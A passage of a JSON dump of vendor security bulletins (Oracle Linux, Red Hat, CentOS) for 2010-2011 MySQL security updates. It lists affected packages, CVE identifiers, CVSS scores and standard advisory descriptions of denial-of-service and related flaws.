"OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "ia64", "packageFilename": "mysql-test-5.0.77-4.el5_5.4.ia64.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "src", "packageFilename": "mysql-5.0.77-4.el5_5.4.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "src", "packageFilename": "mysql-5.0.77-4.el5_5.4.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "src", "packageFilename": "mysql-5.0.77-4.el5_5.4.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "x86_64", "packageFilename": "mysql-server-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageFilename": "mysql-test-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "ia64", "packageFilename": "mysql-5.0.77-4.el5_5.4.ia64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "ia64", "packageFilename": "mysql-server-5.0.77-4.el5_5.4.ia64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageFilename": "mysql-server-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageFilename": "mysql-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageFilename": "mysql-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageFilename": "mysql-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "x86_64", "packageFilename": "mysql-test-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql-test", "operator": "lt"}], "description": " \n[5.0.77-4.4]\r\n- Add fixes for CVE-2010-3677, CVE-2010-3680, CVE-2010-3681, CVE-2010-3682,\r\n CVE-2010-3833, CVE-2010-3835, CVE-2010-3836, CVE-2010-3837, CVE-2010-3838,\r\n CVE-2010-3839, CVE-2010-3840\r\nResolves: #645642\r\n- Backpatch strmov fix so that code can be tested on more recent platforms ", "edition": 3, "reporter": "Oracle", "published": "2010-11-03T00:00:00", "title": "mysql security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2010-11-03T00:00:00", "id": "ELSA-2010-0825", "href": "http://linux.oracle.com/errata/ELSA-2010-0825.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:39:40", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "x86_64", "packageFilename": "mysql-test-5.1.52-1.el6_0.1.x86_64.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "src", "packageFilename": "mysql-5.1.52-1.el6_0.1.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "src", "packageFilename": "mysql-5.1.52-1.el6_0.1.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-test-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "x86_64", "packageFilename": "mysql-bench-5.1.52-1.el6_0.1.x86_64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "x86_64", "packageFilename": "mysql-libs-5.1.52-1.el6_0.1.x86_64.rpm", "packageName": "mysql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-bench-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-libs-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-libs-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "x86_64", "packageFilename": "mysql-embedded-5.1.52-1.el6_0.1.x86_64.rpm", "packageName": "mysql-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "x86_64", "packageFilename": "mysql-devel-5.1.52-1.el6_0.1.x86_64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-devel-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-devel-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "x86_64", "packageFilename": "mysql-server-5.1.52-1.el6_0.1.x86_64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-server-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "x86_64", "packageFilename": "mysql-embedded-devel-5.1.52-1.el6_0.1.x86_64.rpm", "packageName": "mysql-embedded-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-embedded-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-embedded-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "x86_64", "packageFilename": "mysql-5.1.52-1.el6_0.1.x86_64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-embedded-devel-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-embedded-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageFilename": "mysql-embedded-devel-5.1.52-1.el6_0.1.i686.rpm", "packageName": "mysql-embedded-devel", "operator": "lt"}], "description": "[5.1.52-1.1]\n- Update to MySQL 5.1.52, for various fixes described at\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n including numerous small security issues\nResolves: #652553\n- Sync with current Fedora package; this includes:\n- Duplicate COPYING and EXCEPTIONS-CLIENT in -libs and -embedded subpackages,\n to ensure they are available when any subset of mysql RPMs are installed,\n per revised packaging guidelines\n- Allow init script's STARTTIMEOUT/STOPTIMEOUT to be overridden from sysconfig", "edition": 3, "reporter": "Oracle", "published": "2011-02-10T00:00:00", "title": "mysql security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2011-02-10T00:00:00", "id": "ELSA-2011-0164", "href": "http://linux.oracle.com/errata/ELSA-2011-0164.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:44:18", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageFilename": "mysql-bench-4.1.22-2.el4_8.4.i386.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "ia64", "packageFilename": "mysql-4.1.22-2.el4_8.4.ia64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageFilename": "mysql-devel-4.1.22-2.el4_8.4.i386.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "ia64", "packageFilename": "mysql-devel-4.1.22-2.el4_8.4.ia64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "x86_64", "packageFilename": "mysql-devel-4.1.22-2.el4_8.4.x86_64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "x86_64", "packageFilename": "mysql-server-4.1.22-2.el4_8.4.x86_64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "ia64", "packageFilename": "mysql-bench-4.1.22-2.el4_8.4.ia64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageFilename": "mysql-4.1.22-2.el4_8.4.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageFilename": "mysql-4.1.22-2.el4_8.4.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageFilename": "mysql-4.1.22-2.el4_8.4.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "src", "packageFilename": "mysql-4.1.22-2.el4_8.4.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "src", "packageFilename": "mysql-4.1.22-2.el4_8.4.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "src", "packageFilename": "mysql-4.1.22-2.el4_8.4.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "x86_64", "packageFilename": "mysql-4.1.22-2.el4_8.4.x86_64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "ia64", "packageFilename": "mysql-server-4.1.22-2.el4_8.4.ia64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageFilename": "mysql-server-4.1.22-2.el4_8.4.i386.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "x86_64", "packageFilename": "mysql-bench-4.1.22-2.el4_8.4.x86_64.rpm", "packageName": "mysql-bench", "operator": "lt"}], "description": "[4.1.22-2.el4.4]\n- Add fixes for CVE-2010-1848, CVE-2010-3681, CVE-2010-3840\nResolves: #645637\n- Backpatch longlong overflow fix so that code can be tested on\n more recent platforms ", "edition": 3, "reporter": "Oracle", "published": "2010-11-03T00:00:00", "title": "mysql security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3681", "CVE-2010-3840", "CVE-2010-1848"], "modified": "2010-11-03T00:00:00", "id": "ELSA-2010-0824", "href": "http://linux.oracle.com/errata/ELSA-2010-0824.html", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:44:13", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageName": "mysql", "packageFilename": "mysql-5.0.77-4.el5_5.4.i386.rpm", "operator": "lt"}], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity check\nWell-Known Binary (WKB) data. A remote, authenticated attacker could use\nspecially-crafted WKB data to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted after\nthe crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was executed\ntwice in sequence, it could cause an infinite loop, leading to excessive\nCPU use (up to 100%). A remote, authenticated attacker could use this flaw\nto cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a mixture\nof numeric and longblob data types to the LEAST or GREATEST function. A\nremote, authenticated attacker could use this flaw to crash mysqld. This\nissue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements containing\nboth GROUP_CONCAT and the WITH ROLLUP modifier. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted after\nthe crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments in\nview prepare mode. A remote, authenticated attacker could possibly use this\nflaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a value\nto a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST. A remote, authenticated attacker\ncould use this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the crash.\n(CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for some\ncomplex SELECT queries. A remote, authenticated attacker could use this\nflaw to crash mysqld. This issue only caused a temporary denial of service,\nas mysqld was automatically restarted after the crash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated attacker\ncould use this flaw to provide such requests, causing mysqld to crash. This\nissue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage engine. A\nremote, authenticated attacker could use this flaw to crash mysqld. This\nissue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column. A remote, authenticated attacker\ncould use this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the crash.\n(CVE-2010-3677)\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n", "reporter": "RedHat", "published": "2010-11-03T04:00:00", "type": "redhat", "title": "(RHSA-2010:0825) Moderate: mysql security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3677", "CVE-2010-3680", "CVE-2010-3681", "CVE-2010-3682", "CVE-2010-3833", "CVE-2010-3835", "CVE-2010-3836", "CVE-2010-3837", "CVE-2010-3838", "CVE-2010-3839", "CVE-2010-3840"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:14:19", "id": "RHSA-2010:0825", "href": "https://access.redhat.com/errata/RHSA-2010:0825", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-12-11T19:43:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.1.52-1.el6_0.1", "arch": "i686", "packageName": "mysql-debuginfo", "packageFilename": "mysql-debuginfo-5.1.52-1.el6_0.1.i686.rpm", "operator": "lt"}], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known Binary\n(WKB) data, which could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to 100%), if\na stored procedure contained JOIN queries, and that procedure was executed\ntwice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of numeric\nand longblob data types to the LEAST or GREATEST function, could allow a\nremote, authenticated attacker to crash mysqld. (CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare mode,\npossibly allowing a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value functions,\nsuch as LEAST and GREATEST, could allow a remote, authenticated attacker to\ncrash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed MySQL to\nsend OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements that\ndefine NULL columns when using the InnoDB storage engine, could allow a\nremote, authenticated attacker to crash mysqld. (CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the BINLOG\nstatement caused MySQL to read unassigned memory. A remote, authenticated\nattacker could possibly use this flaw to crash mysqld. (CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments to\nthe query, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to retrieve\ndata from a unique SET column could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680, CVE-2010-3678,\nand CVE-2010-3677 only cause a temporary denial of service, as mysqld was\nautomatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the MySQL\nrelease notes for a full list of changes:\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which correct\nthese issues. After installing this update, the MySQL server daemon\n(mysqld) will be restarted automatically.\n", "reporter": "RedHat", "published": "2011-01-18T05:00:00", "type": "redhat", "title": "(RHSA-2011:0164) Moderate: mysql security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3677", "CVE-2010-3678", "CVE-2010-3679", "CVE-2010-3680", "CVE-2010-3681", "CVE-2010-3682", "CVE-2010-3683", "CVE-2010-3833", "CVE-2010-3835", "CVE-2010-3836", "CVE-2010-3837", "CVE-2010-3838", "CVE-2010-3839", "CVE-2010-3840"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:08", "id": "RHSA-2011:0164", "href": "https://access.redhat.com/errata/RHSA-2011:0164", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-12-11T17:43:20", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageName": "mysql", "packageFilename": "mysql-4.1.22-2.el4_8.4.i386.rpm", "operator": "lt"}], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity check\nWell-Known Binary (WKB) data. A remote, authenticated attacker could use\nspecially-crafted WKB data to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted after\nthe crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated attacker\ncould use this flaw to provide such requests, causing mysqld to crash. This\nissue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3681)\n\nA directory traversal flaw was found in the way MySQL handled the\nparameters of the MySQL COM_FIELD_LIST network protocol command. A remote,\nauthenticated attacker could use this flaw to obtain descriptions of the\nfields of an arbitrary table using a request with a specially-crafted\ntable name. (CVE-2010-1848)\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n", "reporter": "RedHat", "published": "2010-11-03T04:00:00", "type": "redhat", "title": "(RHSA-2010:0824) Moderate: mysql security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1848", "CVE-2010-3681", "CVE-2010-3840"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:12:22", "id": "RHSA-2010:0824", "href": "https://access.redhat.com/errata/RHSA-2010:0824", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:24:36", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0825.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-test-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-test", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-server-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-server", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-server-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql-server", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-test-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql-test", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-devel-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-5.0.77-4.el5_5.4.src.rpm", "packageName": "mysql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-5.0.77-4.el5_5.4.src.rpm", "packageName": "mysql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-bench-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-bench", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-bench-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql-bench", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-devel-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "packageFilename": "mysql-devel-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-devel", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0825\n\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity check\nWell-Known Binary (WKB) data. A remote, authenticated attacker could use\nspecially-crafted WKB data to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted after\nthe crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was executed\ntwice in sequence, it could cause an infinite loop, leading to excessive\nCPU use (up to 100%). A remote, authenticated attacker could use this flaw\nto cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a mixture\nof numeric and longblob data types to the LEAST or GREATEST function. A\nremote, authenticated attacker could use this flaw to crash mysqld. This\nissue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements containing\nboth GROUP_CONCAT and the WITH ROLLUP modifier. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary 